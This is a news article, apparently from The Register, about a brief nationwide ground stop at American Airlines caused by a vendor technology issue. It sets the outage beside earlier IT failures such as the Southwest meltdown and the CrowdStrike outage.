American Airlines tells The Register that the technology issue impacted systems necessary for flight releases. In response, the FAA reports that the airline requested a nationwide stop order, which began around 1150 UTC and lasted about an hour.

In a statement, the US’ largest airline blamed a “vendor technology” issue for the disruption, but didn’t name and shame any specific provider.

“That issue has been resolved and flights have resumed. We sincerely apologize to our customers for the inconvenience this morning. It’s all hands on deck as our team is working diligently to get customers where they need to go as quickly as possible,” an American Airlines spokesperson told The Register in an email.

American Airlines didn’t address El Reg’s questions as to whether resolving the issue could result in additional delays or disruptions over the holiday season.

The airline is encouraging customers to use their mobile app or visit their website for information on how the outage may have affected their flights and connections.

The incident comes amid one of the busiest travel seasons of the year, with the Transportation Security Administration (TSA) expecting to screen nearly 40 million passengers over the peak Christmas and New Year’s travel period.

As technology-related travel disruptions go, an hour-long grounding is far from the worst. Over the past few years, we’ve seen numerous situations in which IT failures have left millions stranded. Two years ago, an IT meltdown at Southwest Airlines left roughly 2 million travelers stranded as crews were forced to schedule flights manually in what was later described as an “extraordinarily difficult” and “tedious, long process.”

More recently, the now-infamous CrowdStrike outage brought much of the IT world to a standstill. It is estimated that the flawed update to the Falcon threat-detection system crashed and disabled more than 8 million Microsoft Windows machines around the world. Among them were more than 37,000 systems operated by Delta Air Lines. The incident resulted in travel delays for more than 1.3 million people, the airline later revealed. ®
